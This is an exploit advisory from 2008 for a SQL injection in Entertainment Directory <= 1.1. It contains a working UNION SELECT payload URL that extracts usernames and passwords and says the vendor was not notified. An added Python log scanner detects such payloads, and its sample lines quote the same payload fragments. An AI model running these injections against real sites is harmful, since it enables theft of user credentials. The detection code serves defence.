--==+================================================================================+==--
--==+          Entertainment Directory <= 1.1 SQL Injection Vulnerability           +==--
--==+================================================================================+==--



Discovered By: t0pP8uZz & xprog
Discovered On: 5 April 2008
Script Download: http://www.turnkeyzone.com
DORK: N/A
Vendor Has Not Been Notified!


DESCRIPTION:
Entertainment Directory is vulnerable due to an insecure MySQL query. This allows a remote attacker
to obtain user credentials from the database.


EXPLOITS:
http://site.com/directory.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,CONCAT(username,char(58),password),9,10,11,12,13,14/**/FROM/**/users/*
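
Added example (not part of the original advisory and not the vendor's code): a log check that flags requests to directory.php whose cat parameter is not a plain integer, and marks those that carry SQL keywords once the /**/ comment padding is collapsed. It assumes a legitimate cat value is a non-negative integer and that the web server writes common-format access logs; the sample log lines, IPs and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines for illustration; IPs and timestamps are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Apr/2008:10:00:01 +0000] "GET /directory.php?cat=7 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [05/Apr/2008:10:00:09 +0000] "GET /directory.php?cat=-1/**/UNION/**/ALL'
    '/**/SELECT/**/1,2/**/FROM/**/users/* HTTP/1.1" 200 911',
    '192.0.2.44 - - [05/Apr/2008:10:00:12 +0000] "GET /directory.php?cat=-1%2F%2A%2A%2Funion'
    '%2F%2A%2A%2Fselect%2F%2A%2A%2F1 HTTP/1.1" 200 911',
    '192.0.2.10 - - [05/Apr/2008:10:00:20 +0000] "GET /index.php?cat=abc HTTP/1.1" 200 300',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Matches closed /* ... */ comments and an unterminated trailing /* comment.
COMMENT_RE = re.compile(r'/\*.*?\*/|/\*.*$', re.S)
KEYWORD_RE = re.compile(r'\b(union|select|from|concat)\b', re.I)

def normalize(value):
    """Collapse MySQL comments used as whitespace so the statement is readable."""
    return ' '.join(COMMENT_RE.sub(' ', value).split())

def classify_cat(value):
    """Return (verdict, text); verdict is 'ok', 'non-numeric' or 'sqli'."""
    if re.fullmatch(r'[0-9]+', value):  # assumption: category ids are plain integers
        return 'ok', value
    text = normalize(value)
    return ('sqli' if KEYWORD_RE.search(text) else 'non-numeric'), text

def scan(lines, script='/directory.php', param='cat'):
    """Yield (line_number, verdict, normalized_value) for suspicious requests."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if url.path != script:
            continue
        # parse_qs percent-decodes values, so URL-encoded payloads are seen in clear.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            verdict, text = classify_cat(value)
            if verdict != 'ok':
                yield number, verdict, text

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The 'non-numeric' verdict is the more useful control: rejecting any cat value that is not an integer before it reaches the query covers payloads that a keyword list would miss.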



NOTE/TIP:


GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew!



--==+================================================================================+==--
--==+          Entertainment Directory <= 1.1 SQL Injection Vulnerability           +==--
--==+================================================================================+==--

# milw0rm.com [2008-04-05]
Entertainment Directory 1.1 SQL Injection Vulnerability
t0pP8uZz
04/05/2008